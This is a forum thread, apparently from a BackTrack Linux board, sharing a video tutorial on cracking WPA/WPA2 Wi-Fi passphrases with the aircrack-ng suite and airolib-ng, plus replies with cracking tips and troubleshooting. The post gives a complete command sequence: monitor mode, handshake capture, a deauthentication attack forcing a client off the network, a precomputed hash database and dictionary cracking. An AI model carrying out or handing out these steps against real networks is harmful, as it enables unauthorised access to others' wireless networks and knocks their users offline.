[Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2318855/
Download video: http://www.mediafire.com/?kn0b37v79rptd9e
What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been "pre-salted" with the ESSID for the network to get the pass-phrase.
How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake
What do I need?
> aircrack-ng suite
> WiFi Card that supports monitor mode
> Big dictionary
> Processing power
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz
Commands:
Code:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output*.cap
Notes:
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECT client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!
Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03
Blog Post:http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1656-%5Bvideo%5D-how-crack-wpa-wpa2-aircrack-ng-airolib-ng.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
thanks for the post .. but same problem .. need big dictionary :( .. but it could be solved if having good luck :)
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
m0j4h3d...try john the ripper and crunch for that...but it can take a long..long...time
c
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote:
Originally Posted by
m0j4h3d
thanks for the post .. but same problem .. need big dictionary :( .. but it could be solved if having good luck :)
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
What about using genpmk and the essid to pre-compute your hash files, and then cracking with cowpatty? Right now i'm actually torrenting the shmoo top 1000 essids rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running bt4 im already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repo's.
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote:
Originally Posted by
gunrunr
What about using genpmk and the essid to pre-compute your hash files, and then cracking with cowpatty? Right now i'm actually torrenting the shmoo top 1000 essids rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running bt4 im already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repo's.
Hello,
I did a video on my blog of Aircrack-ng vs coWPAtty, comparing the speeds & time it takes to crack, and Ive now posted it here for you:
http://www.backtrack-linux.org/forum....html#post8094
and yes, Ive also got a torrent on the go, seeding a few hashes & dictionaries myself!
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Thanks,
Nice share , I hav'nt seen such gr8 explaination elsewhere
But I am facing some problems !!! Can u PLease HELP ME ??:confused:
I hav successfully executed commands :
Quote:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
But the command "aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0"
NOT working properly as shown in fig ..
http://img210.imageshack.us/img210/4444/77296826.jpg
Can u tell me What is problem der ?
Also Please help me 2 solve this problem !!!!!
Thank U !!! Waiting !!!
MOD EDIT: Removed Huge Picture. Left Link in place.
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote:
Originally Posted by
patilmanali1989
Thanks,
Nice share , I hav'nt seen such gr8 explaination elsewhere
But I am facing some problems !!! Can u PLease HELP ME ??:confused:
I hav successfully executed commands :
But the command "aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0"
NOT working properly as shown in fig ..
* HUGE PICTURE*
Can u tell me What is problem der ?
Also Please help me 2 solve this problem !!!!!
Thank U !!! Waiting !!!
Well... the AP, is on a different channel to you! (Your on 1, its on 6!)
What OS is the client running? It didnt work 100% for me, when the client was Windows 7...
Ive also found that the some attacks work better with different routers...Swap the router if you have another one?
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Hello g0tmi1k!
I've got a problem too. :(
If I upload a video to YouTube, will You tell me what am I doing wrong?
Thanks!
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote:
Originally Posted by
cimbi
Hello g0tmi1k!
I've got a problem too. :(
If I upload a video to YouTube, will You tell me what am I doing wrong?
Thanks!
Your problem is asking for permission to upload to youtube?
Sure...I guess? Just make sure to give credit/link back.
